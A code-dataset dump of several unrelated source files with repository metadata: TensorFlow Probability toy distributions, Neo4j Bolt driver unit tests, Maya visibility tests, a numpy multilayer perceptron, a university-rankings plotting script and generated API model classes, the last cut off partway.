kinoute/google-research
|
4a59cab927579ea9722e43252c695de5da4eb5e2
|
[
"Apache-2.0"
] | 11
|
2020-01-29T07:25:04.000Z
|
2022-03-05T16:01:21.000Z
|
eim/small_problems_dists.py
|
zhangyuezjx/google-research
|
4a59cab927579ea9722e43252c695de5da4eb5e2
|
[
"Apache-2.0"
] | 13
|
2020-01-28T22:19:53.000Z
|
2022-02-10T00:39:26.000Z
|
eim/small_problems_dists.py
|
zhangyuezjx/google-research
|
4a59cab927579ea9722e43252c695de5da4eb5e2
|
[
"Apache-2.0"
] | 2
|
2020-02-27T11:09:49.000Z
|
2021-08-25T07:32:15.000Z
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Synthetic datasets for EIM experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
from six.moves import range
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
NINE_GAUSSIANS_DIST = "nine_gaussians"
TWO_RINGS_DIST = "two_rings"
CHECKERBOARD_DIST = "checkerboard"
TARGET_DISTS = [NINE_GAUSSIANS_DIST, TWO_RINGS_DIST, CHECKERBOARD_DIST]
class Ring2D(tfd.Distribution):
"""2D Ring distribution."""
def __init__(self,
radius_dist=None,
dtype=tf.float32,
validate_args=False,
allow_nan_stats=True,
name="Ring"):
parameters = dict(locals())
loc = tf.zeros([2], dtype=dtype)
if radius_dist is None:
radius_dist = tfd.Normal(loc=1., scale=0.1)
self._loc = loc
self._radius_dist = radius_dist
super(Ring2D, self).__init__(
dtype=dtype,
reparameterization_type=tfd.NOT_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._loc],
name=name)
@property
def loc(self):
"""Distribution parameter for the mean."""
return self._loc
def _batch_shape_tensor(self):
return tf.broadcast_dynamic_shape(
tf.shape(self._loc)[:-1], self._radius_dist.batch_shape_tensor)
def _batch_shape(self):
return tf.broadcast_static_shape(self._loc.get_shape()[:-1],
self._radius_dist.batch_shape)
def _event_shape_tensor(self):
return tf.constant([2], dtype=tf.int32)
def _event_shape(self):
return tf.TensorShape([2])
def _sample_n(self, n, seed=None):
new_shape = tf.concat([[n], self.batch_shape_tensor()], 0)
thetas = tf.random_uniform(
new_shape, seed=seed, dtype=self.dtype) * 2. * math.pi
rs = self._radius_dist.sample(new_shape, seed=seed)
vecs = tf.stack([tf.math.sin(thetas), tf.math.cos(thetas)], axis=-1)
sample = vecs * tf.expand_dims(rs, axis=-1)
return tf.cast(sample, self.dtype)
def _log_prob(self, event):
radii = tf.norm(event, axis=-1, ord=2)
return self._radius_dist.log_prob(radii) - tf.log(2 * math.pi * radii)
def two_rings_dist(scale=0.1):
r_dist = tfd.Mixture(
cat=tfd.Categorical(probs=[1., 1.]),
components=[
tfd.Normal(loc=0.6, scale=scale),
tfd.Normal(loc=1.3, scale=scale)
])
return Ring2D(radius_dist=r_dist)
def checkerboard_dist(num_splits=4):
"""Returns a checkerboard distribution."""
bounds = np.linspace(-2., 2., num=(num_splits + 1), endpoint=True)
uniforms = []
for i in range(num_splits):
for j in range(num_splits):
if ((i % 2 == 0 and j % 2 == 0) or (i % 2 != 0 and j % 2 != 0)):
low = tf.convert_to_tensor([bounds[i], bounds[j]], dtype=tf.float32)
high = tf.convert_to_tensor([bounds[i + 1], bounds[j + 1]],
dtype=tf.float32)
u = tfd.Uniform(low=low, high=high)
u = tfd.Independent(u, reinterpreted_batch_ndims=1)
uniforms.append(u)
return tfd.Mixture(
cat=tfd.Categorical(probs=[1.] * len(uniforms)), components=uniforms)
def nine_gaussians_dist(variance=0.1):
"""Creates a mixture of 9 2-D gaussians on a 3x3 grid centered at 0."""
components = []
for i in [-1., 0., 1.]:
for j in [-1., 0., 1.]:
loc = tf.constant([i, j], dtype=tf.float32)
scale = tf.ones_like(loc) * tf.sqrt(variance)
components.append(tfd.MultivariateNormalDiag(loc=loc, scale_diag=scale))
return tfd.Mixture(
cat=tfd.Categorical(probs=tf.ones([9], dtype=tf.float32) / 9.),
components=components)
def get_target_distribution(name, nine_gaussians_variance=0.01):
if name == NINE_GAUSSIANS_DIST:
return nine_gaussians_dist(variance=nine_gaussians_variance)
elif name == TWO_RINGS_DIST:
return two_rings_dist()
elif name == CHECKERBOARD_DIST:
return checkerboard_dist()
else:
raise ValueError("Invalid target name.")
| 33.546099
| 78
| 0.674841
|
0c0b1a9a4f544d088a00f4900d5baae9d960fd63
| 6,268
|
py
|
Python
|
tests/unit/io/test_class_bolt4x2.py
|
glesage/neo4j-python-driver
|
540af77063f0ffddc6d73d371bcde90c4e75032d
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/io/test_class_bolt4x2.py
|
glesage/neo4j-python-driver
|
540af77063f0ffddc6d73d371bcde90c4e75032d
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/io/test_class_bolt4x2.py
|
glesage/neo4j-python-driver
|
540af77063f0ffddc6d73d371bcde90c4e75032d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (c) "Neo4j"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from neo4j.io._bolt4 import Bolt4x2
from neo4j.conf import PoolConfig
@pytest.mark.parametrize("set_stale", (True, False))
def test_conn_is_stale(fake_socket, set_stale):
address = ("127.0.0.1", 7687)
max_connection_lifetime = 0
connection = Bolt4x2(address, fake_socket(address), max_connection_lifetime)
if set_stale:
connection.set_stale()
assert connection.stale() is True
@pytest.mark.parametrize("set_stale", (True, False))
def test_conn_is_not_stale_if_not_enabled(fake_socket, set_stale):
address = ("127.0.0.1", 7687)
max_connection_lifetime = -1
connection = Bolt4x2(address, fake_socket(address), max_connection_lifetime)
if set_stale:
connection.set_stale()
assert connection.stale() is set_stale
@pytest.mark.parametrize("set_stale", (True, False))
def test_conn_is_not_stale(fake_socket, set_stale):
address = ("127.0.0.1", 7687)
max_connection_lifetime = 999999999
connection = Bolt4x2(address, fake_socket(address), max_connection_lifetime)
if set_stale:
connection.set_stale()
assert connection.stale() is set_stale
def test_db_extra_in_begin(fake_socket):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.begin(db="something")
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x11"
assert len(fields) == 1
assert fields[0] == {"db": "something"}
def test_db_extra_in_run(fake_socket):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.run("", {}, db="something")
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x10"
assert len(fields) == 3
assert fields[0] == ""
assert fields[1] == {}
assert fields[2] == {"db": "something"}
def test_n_extra_in_discard(fake_socket):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.discard(n=666)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x2F"
assert len(fields) == 1
assert fields[0] == {"n": 666}
@pytest.mark.parametrize(
"test_input, expected",
[
(666, {"n": -1, "qid": 666}),
(-1, {"n": -1}),
]
)
def test_qid_extra_in_discard(fake_socket, test_input, expected):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.discard(qid=test_input)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x2F"
assert len(fields) == 1
assert fields[0] == expected
@pytest.mark.parametrize(
"test_input, expected",
[
(777, {"n": 666, "qid": 777}),
(-1, {"n": 666}),
]
)
def test_n_and_qid_extras_in_discard(fake_socket, test_input, expected):
# python -m pytest tests/unit/io/test_class_bolt4x0.py -s -k test_n_and_qid_extras_in_discard
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.discard(n=666, qid=test_input)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x2F"
assert len(fields) == 1
assert fields[0] == expected
@pytest.mark.parametrize(
"test_input, expected",
[
(666, {"n": 666}),
(-1, {"n": -1}),
]
)
def test_n_extra_in_pull(fake_socket, test_input, expected):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.pull(n=test_input)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x3F"
assert len(fields) == 1
assert fields[0] == expected
@pytest.mark.parametrize(
"test_input, expected",
[
(777, {"n": -1, "qid": 777}),
(-1, {"n": -1}),
]
)
def test_qid_extra_in_pull(fake_socket, test_input, expected):
# python -m pytest tests/unit/io/test_class_bolt4x0.py -s -k test_qid_extra_in_pull
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.pull(qid=test_input)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x3F"
assert len(fields) == 1
assert fields[0] == expected
def test_n_and_qid_extras_in_pull(fake_socket):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.pull(n=666, qid=777)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x3F"
assert len(fields) == 1
assert fields[0] == {"n": 666, "qid": 777}
def test_hello_passes_routing_metadata(fake_socket_pair):
address = ("127.0.0.1", 7687)
sockets = fake_socket_pair(address)
sockets.server.send_message(0x70, {"server": "Neo4j/4.2.0"})
connection = Bolt4x2(address, sockets.client, PoolConfig.max_connection_lifetime,
routing_context={"foo": "bar"})
connection.hello()
tag, fields = sockets.server.pop_message()
assert tag == 0x01
assert len(fields) == 1
assert fields[0]["routing"] == {"foo": "bar"}
| 31.817259
| 97
| 0.676771
|
5cc6eae053d4c551668a17c685d5353aa61493c3
| 1,411
|
py
|
Python
|
venv/lib/python3.8/site-packages/vsts/test/v4_0/models/test_results_query.py
|
amcclead7336/Enterprise_Data_Science_Final
|
ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28
|
[
"Unlicense",
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/vsts/test/v4_0/models/test_results_query.py
|
amcclead7336/Enterprise_Data_Science_Final
|
ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28
|
[
"Unlicense",
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/vsts/test/v4_0/models/test_results_query.py
|
amcclead7336/Enterprise_Data_Science_Final
|
ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28
|
[
"Unlicense",
"MIT"
] | 2
|
2021-05-23T16:46:31.000Z
|
2021-05-26T23:51:09.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest.serialization import Model
class TestResultsQuery(Model):
"""TestResultsQuery.
:param fields:
:type fields: list of str
:param results:
:type results: list of :class:`TestCaseResult <test.v4_0.models.TestCaseResult>`
:param results_filter:
:type results_filter: :class:`ResultsFilter <test.v4_0.models.ResultsFilter>`
"""
_attribute_map = {
'fields': {'key': 'fields', 'type': '[str]'},
'results': {'key': 'results', 'type': '[TestCaseResult]'},
'results_filter': {'key': 'resultsFilter', 'type': 'ResultsFilter'}
}
def __init__(self, fields=None, results=None, results_filter=None):
super(TestResultsQuery, self).__init__()
self.fields = fields
self.results = results
self.results_filter = results_filter
| 41.5
| 95
| 0.529412
|
22240314fda50cbe3bfd6fc427bfb572ff601465
| 1,584
|
py
|
Python
|
infra/tools/metric_tool/test/data/normal_case_2.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
infra/tools/metric_tool/test/data/normal_case_2.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
infra/tools/metric_tool/test/data/normal_case_2.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Example containing all metrics, all with descriptions.
Tests assume the description contains the name of the metric, without
the prefix.
"""
from infra_libs.ts_mon import BooleanMetric, CounterMetric
from infra_libs.ts_mon import CumulativeDistributionMetric, CumulativeMetric
from infra_libs.ts_mon import DistributionMetric, FloatMetric
from infra_libs.ts_mon import GaugeMetric, NonCumulativeDistributionMetric
from infra_libs.ts_mon import StringMetric
metric1 = BooleanMetric('my/metric1', description='metric1')
metric2 = CounterMetric('my/metric2', description='metric2')
metric3 = CumulativeDistributionMetric('my/metric3',
description='metric3')
metric4 = CumulativeMetric('my/metric4', description='metric4')
# Add a wrapping function to check that we're finding those as well.
def nice_function():
# Checking that we really ignore comments.
# FloatMetric('my/metric11', description='metric11')
metric6 = FloatMetric('my/metric6', description='metric6')
metric7 = GaugeMetric('my/metric7', description='metric7')
metric8 = NonCumulativeDistributionMetric('my/metric8',
description='metric8')
metric9 = StringMetric('my/metric9', description='metric9')
# Use all variables to silence pylint.
print metric6, metric7, metric8, metric9
# Some unrelated code to add noise
if __name__ == '__main__':
pass
| 38.634146
| 76
| 0.746843
|
86fdc763a67ef0a2a47e99f06e84d61f16fa8834
| 1,464
|
py
|
Python
|
src/pilot/utils.py
|
digambar15/JetPack
|
808d4a84076a3700b0ba9f07c512e99e81c5c9eb
|
[
"Apache-2.0"
] | 1
|
2020-07-16T10:03:56.000Z
|
2020-07-16T10:03:56.000Z
|
src/pilot/utils.py
|
MuhammadAsif1/JetPack
|
a8fc31c4f6a921958c81e9c2e2b17b146b34e35c
|
[
"Apache-2.0"
] | 4
|
2018-08-23T15:02:59.000Z
|
2018-10-11T07:58:33.000Z
|
src/pilot/utils.py
|
digambar15/JetPack
|
808d4a84076a3700b0ba9f07c512e99e81c5c9eb
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2017-2020 Dell Inc. or its subsidiaries.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from constants import Constants
class Utils:
@staticmethod
def get_model_properties(
json_filename=Constants.MODEL_PROPERTIES_FILENAME):
model_properties = None
expanded_filename = os.path.expanduser(json_filename)
try:
with open(expanded_filename, 'r') as f:
try:
model_properties = json.load(f)
except ValueError as ex:
ex.message = "Could not deserialize model properties " \
"file {}: {}".format(expanded_filename, ex.message)
raise
except IOError as ex:
ex.message = "Could not open model properties file {}: {}".format(
expanded_filename, ex.message)
raise
return model_properties
| 34.046512
| 78
| 0.651639
|
a8926f6a515578a718362877f3a6d658cbd134c2
| 2,626
|
py
|
Python
|
downloaded_kernels/university_rankings/kernel_24.py
|
josepablocam/common-code-extraction
|
a6978fae73eee8ece6f1db09f2f38cf92f03b3ad
|
[
"MIT"
] | null | null | null |
downloaded_kernels/university_rankings/kernel_24.py
|
josepablocam/common-code-extraction
|
a6978fae73eee8ece6f1db09f2f38cf92f03b3ad
|
[
"MIT"
] | null | null | null |
downloaded_kernels/university_rankings/kernel_24.py
|
josepablocam/common-code-extraction
|
a6978fae73eee8ece6f1db09f2f38cf92f03b3ad
|
[
"MIT"
] | 2
|
2021-07-12T00:48:08.000Z
|
2021-08-11T12:53:05.000Z
|
######### INSTRUCTIONS #########
#
# Fork this script and change the university name to see what rank it gets:
#
my_university_name = ["Indiana University Bloomington"]
#
# Look at the log for a full list of universities you can choose from.
#
# If your university is listed under multiple names, you can combine as many names as you want like this:
# my_university_name = ["The Johns Hopkins University", "Johns Hopkins University"]
#
################################
# Import Packages
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import seaborn as sns
import matplotlib.pyplot as plt
sns.set(style="ticks", color_codes=True)
plt.rcParams['figure.figsize'] = 16, 12
# Import Data
timesData = pd.read_csv("../input/timesData.csv")
shanghaiData = pd.read_csv("../input/shanghaiData.csv")
cwurData = pd.read_csv("../input/cwurData.csv")
# Print off a list of universities
all_university_names = set(timesData.university_name).union(set(shanghaiData.university_name)).union(set(cwurData.institution))
all_university_names_list = [str(i) for i in (list(all_university_names))]
print("List of All Universities in Dataset")
print("-----------------------------------")
print ('\n'.join([ str(university) for university in sorted(all_university_names_list) ]))
times_plot_data = timesData[timesData.university_name.isin(my_university_name)][['world_rank','year']]
shanghai_plot_data = shanghaiData[shanghaiData.university_name.isin(my_university_name)][['world_rank','year']]
cwur_plot_data = cwurData[cwurData.institution.isin(my_university_name)][['world_rank','year']]
times_plot_data['source'] = 'Times'
shanghai_plot_data['source'] = 'Shanghai'
cwur_plot_data['source'] = 'CWUR'
# parse the first number in rank for data ranges
times_plot_data['world_rank'] = times_plot_data['world_rank'].str.split('-').str[0]
shanghai_plot_data['world_rank'] = shanghai_plot_data['world_rank'].str.split('-').str[0]
plot_data = times_plot_data.append(shanghai_plot_data).append(cwur_plot_data)
plot_data['world_rank'] = plot_data['world_rank'].astype(int)
ax = sns.pointplot(x='year',y='world_rank',hue='source',data=plot_data);
# Styling
plt.title(my_university_name[0] + " Ranking", fontsize=26)
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
plt.ylabel("World Rank", fontsize=26)
plt.xlabel("Year", fontsize=26)
plt.tight_layout()
plt.legend(loc='upper left',fontsize=20)
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
# Save File
plt.savefig('university.png')
| 38.057971
| 127
| 0.734196
|
9c140aafc2db2af7e2f5557e9135745c5103d8ae
| 2,293
|
py
|
Python
|
MLP/MLP.py
|
wicky1234444/MyMLCodes
|
8f7b37beb354d32b39d90ef370aefa13e45eee3f
|
[
"MIT"
] | null | null | null |
MLP/MLP.py
|
wicky1234444/MyMLCodes
|
8f7b37beb354d32b39d90ef370aefa13e45eee3f
|
[
"MIT"
] | null | null | null |
MLP/MLP.py
|
wicky1234444/MyMLCodes
|
8f7b37beb354d32b39d90ef370aefa13e45eee3f
|
[
"MIT"
] | null | null | null |
import numpy as np
class MLP: ##multi layer perceptron
def __init__(self, layer_dimensions, lr, activation_function='sigmoid'):
self.W = [] ## weights
self.B = [] ## biases
for i in range(len(layer_dimensions)-1): ## weight and bias initialization ~ uniform(0,1)
Weights = np.random.uniform(0,1, (layer_dimensions[i+1], layer_dimensions[i]))
bias = np.random.uniform(0,1, layer_dimensions[i+1])
self.W.append(Weights)
self.B.append(bias)
self.lr = lr
self.act = activation_function ##sigmoid is used for now
def Forward(self, input): ## feed the input forward into the network and calculate layer wise outputs
L = len(self.W)
layer_wise_outputs = []
layer_wise_outputs.append(input)
for i in range(L):
output = np.dot(layer_wise_outputs[-1],np.transpose(self.W[i]))
output+=self.B[i]
if self.act == 'sigmoid': ## non-linear activation
output = 1/(1+np.exp(-output))
elif self.act == 'tanh':
output = np.tanh(output)
elif self.act == 'relu':
output = max(output, 0)
layer_wise_outputs.append(output)
return layer_wise_outputs
def gradient_calci(self, outputs, target):
error = (target-outputs[-1])
W_grad = [] ## gradients for weights
B_grad = [] ## local gradients (also gradients for biases)
B_grad.append(np.multiply(error, np.multiply(1-outputs[-1],outputs[-1])))
for i in reversed(range(len(self.W))):
W_grad.append(np.dot(B_grad[-1].reshape(-1,1), outputs[i].reshape(1,-1)))
gr = np.dot(B_grad[-1], self.W[i])
gr = np.multiply(np.multiply(1-outputs[i], outputs[i]), gr)
B_grad.append(gr)
return [W_grad, B_grad]
def backprop(self, grad):
k=0 ##update the weights and biases of the network based on gradents from gradient_calci
W_grad = grad[0]
B_grad = grad[1]
for i in reversed(range(len(self.W))):
self.W[i]+=self.lr*W_grad[k]
self.B[i]+=self.lr*B_grad[k]
k+=1
| 44.960784
| 115
| 0.557785
|
8821d6edf40de8c49f21ff58cb64078872cec28c
| 465
|
py
|
Python
|
Python/Programming Fundamentals/Dictionaries/01. A Minor Task.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
Python/Programming Fundamentals/Dictionaries/01. A Minor Task.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
Python/Programming Fundamentals/Dictionaries/01. A Minor Task.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
def validate_key_existing(dictionary, key, def_value=0):
if key not in dictionary:
dictionary[key] = def_value
def print_dict(dictionary, template):
for k, v in dictionary.items():
print(template.format(k, v))
resources = {}
while True:
entry = input()
if entry == 'stop':
break
quantity = int(input())
validate_key_existing(resources, entry)
resources[entry] += quantity
print_dict(resources, '{} -> {}')
| 20.217391
| 56
| 0.643011
|
fe6601829fda62c4bfa3c15a3ad22879563a562c
| 5,746
|
py
|
Python
|
test/lib/mayaUsd/render/mayaToHydra/testMtohVisibility.py
|
ika-rporter/maya-usd
|
8f216a4fb955fc44c0abda55caa53ed295aaa625
|
[
"Apache-2.0"
] | 507
|
2019-07-30T20:05:10.000Z
|
2022-03-30T07:38:43.000Z
|
test/lib/mayaUsd/render/mayaToHydra/testMtohVisibility.py
|
ika-rporter/maya-usd
|
8f216a4fb955fc44c0abda55caa53ed295aaa625
|
[
"Apache-2.0"
] | 1,188
|
2019-07-31T11:27:27.000Z
|
2022-03-31T21:06:06.000Z
|
test/lib/mayaUsd/render/mayaToHydra/testMtohVisibility.py
|
ika-rporter/maya-usd
|
8f216a4fb955fc44c0abda55caa53ed295aaa625
|
[
"Apache-2.0"
] | 165
|
2019-07-30T22:27:57.000Z
|
2022-03-25T07:20:23.000Z
|
import maya.cmds as cmds
import fixturesUtils
import mtohUtils
class TestCommand(mtohUtils.MtohTestCase):
_file = __file__
def setUp(self):
self.makeCubeScene(camDist=6)
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeTrans)))
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeShape)))
def test_toggleTransVis(self):
# because snapshotting is slow, we only use it in this test - otherwise
# we assume the results of `listRenderIndex=..., visibileOnly=1` are
# sufficient
cubeUnselectedImg = "cube_unselected.png"
nothingImg = "nothing.png"
cmds.refresh()
self.assertIn(
self.cubeRprim,
self.getVisibleIndex())
self.assertSnapshotClose(cubeUnselectedImg)
cmds.setAttr("{}.visibility".format(self.cubeTrans), False)
self.assertFalse(cmds.getAttr("{}.visibility".format(self.cubeTrans)))
cmds.refresh()
self.assertNotIn(
self.cubeRprim,
self.getVisibleIndex())
self.assertSnapshotClose(nothingImg)
cmds.setAttr("{}.visibility".format(self.cubeTrans), True)
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeTrans)))
cmds.refresh()
self.assertIn(
self.cubeRprim,
self.getVisibleIndex())
self.assertSnapshotClose(cubeUnselectedImg)
def test_toggleShapeVis(self):
cmds.setAttr("{}.visibility".format(self.cubeShape), False)
self.assertFalse(cmds.getAttr("{}.visibility".format(self.cubeShape)))
cmds.refresh()
self.assertNotIn(
self.cubeRprim,
self.getVisibleIndex())
cmds.setAttr("{}.visibility".format(self.cubeShape), True)
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeShape)))
cmds.refresh()
self.assertIn(
self.cubeRprim,
self.getVisibleIndex())
def test_toggleBothVis(self):
cmds.setAttr("{}.visibility".format(self.cubeTrans), False)
self.assertFalse(cmds.getAttr("{}.visibility".format(self.cubeTrans)))
cmds.setAttr("{}.visibility".format(self.cubeShape), False)
self.assertFalse(cmds.getAttr("{}.visibility".format(self.cubeShape)))
cmds.refresh()
self.assertNotIn(
self.cubeRprim,
self.getVisibleIndex())
cmds.setAttr("{}.visibility".format(self.cubeTrans), True)
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeTrans)))
cmds.setAttr("{}.visibility".format(self.cubeShape), True)
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeShape)))
cmds.refresh()
self.assertIn(
self.cubeRprim,
self.getVisibleIndex())
def doHierarchicalVisibilityTest(self, makeNodeVis, makeNodeInvis, prep=None):
lowGroup = cmds.group(self.cubeTrans, name='lowGroup')
midGroup = cmds.group(lowGroup, name='midGroup')
highGroup = cmds.group(midGroup, name='highGroup')
hier = [midGroup, midGroup, lowGroup, self.cubeTrans, self.cubeShape]
cmds.select(clear=1)
cmds.refresh()
self.cubeRprim = self.rprimPath(self.cubeShape)
visIndex = [self.cubeRprim]
self.assertEqual(self.getVisibleIndex(), visIndex)
if prep is not None:
for obj in hier:
prep(obj)
self.assertEqual(self.getVisibleIndex(), visIndex)
for obj in hier:
makeNodeInvis(obj)
cmds.refresh()
self.assertEqual(self.getVisibleIndex(), [])
makeNodeVis(obj)
cmds.refresh()
self.assertEqual(self.getVisibleIndex(), visIndex)
def test_hierarchicalVisibility(self):
def makeNodeVis(obj):
cmds.setAttr("{}.visibility".format(obj), True)
def makeNodeInvis(obj):
cmds.setAttr("{}.visibility".format(obj), False)
self.doHierarchicalVisibilityTest(makeNodeVis, makeNodeInvis)
def test_hierarchicalIntermediateObject(self):
def makeNodeVis(obj):
cmds.setAttr("{}.intermediateObject".format(obj), False)
def makeNodeInvis(obj):
cmds.setAttr("{}.intermediateObject".format(obj), True)
self.doHierarchicalVisibilityTest(makeNodeVis, makeNodeInvis)
def test_hierarchicalOverrideEnabled(self):
def makeNodeVis(obj):
cmds.setAttr("{}.overrideEnabled".format(obj), False)
def makeNodeInvis(obj):
cmds.setAttr("{}.overrideEnabled".format(obj), True)
def prep(obj):
# set the overrideVisibility to False - as long as the
# overrideEnabled is NOT set, the object should still
# be visible
cmds.setAttr("{}.overrideVisibility".format(obj), False)
cmds.setAttr("{}.overrideEnabled".format(obj), False)
self.doHierarchicalVisibilityTest(makeNodeVis, makeNodeInvis, prep=prep)
def test_hierarchicalOverrideVisibility(self):
def makeNodeVis(obj):
cmds.setAttr("{}.overrideVisibility".format(obj), True)
def makeNodeInvis(obj):
cmds.setAttr("{}.overrideVisibility".format(obj), False)
def prep(obj):
# set the overrideEnabled to True - as long as the
# overrideVisibility is True, the object should still
# be visible
cmds.setAttr("{}.overrideEnabled".format(obj), True)
cmds.setAttr("{}.overrideVisibility".format(obj), True)
self.doHierarchicalVisibilityTest(makeNodeVis, makeNodeInvis, prep=prep)
if __name__ == '__main__':
fixturesUtils.runTests(globals())
| 36.833333
| 82
| 0.635921
|
b26521855377abfff08c3196d86305bd36b6bf0a
| 4,569
|
py
|
Python
|
rustici_software_cloud_v2/models/settings_individual_schema.py
|
RusticiSoftware/scormcloud-api-v2-client-python
|
04e2cce304a336caf492c3330c706840815c4abe
|
[
"Apache-2.0"
] | 2
|
2020-07-21T10:33:39.000Z
|
2021-08-17T21:40:13.000Z
|
rustici_software_cloud_v2/models/settings_individual_schema.py
|
RusticiSoftware/scormcloud-api-v2-client-python
|
04e2cce304a336caf492c3330c706840815c4abe
|
[
"Apache-2.0"
] | 2
|
2020-10-22T20:58:19.000Z
|
2020-10-27T17:25:28.000Z
|
rustici_software_cloud_v2/models/settings_individual_schema.py
|
RusticiSoftware/scormcloud-api-v2-client-python
|
04e2cce304a336caf492c3330c706840815c4abe
|
[
"Apache-2.0"
] | 1
|
2020-10-15T17:11:15.000Z
|
2020-10-15T17:11:15.000Z
|
# coding: utf-8
"""
SCORM Cloud Rest API
REST API used for SCORM Cloud integrations. # noqa: E501
OpenAPI spec version: 2.0
Contact: systems@rusticisoftware.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class SettingsIndividualSchema(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'setting_id': 'str',
'value': 'str',
'explicit': 'bool'
}
attribute_map = {
'setting_id': 'settingId',
'value': 'value',
'explicit': 'explicit'
}
def __init__(self, setting_id=None, value=None, explicit=False): # noqa: E501
"""SettingsIndividualSchema - a model defined in Swagger""" # noqa: E501
self._setting_id = None
self._value = None
self._explicit = None
self.discriminator = None
if setting_id is not None:
self.setting_id = setting_id
if value is not None:
self.value = value
if explicit is not None:
self.explicit = explicit
@property
def setting_id(self):
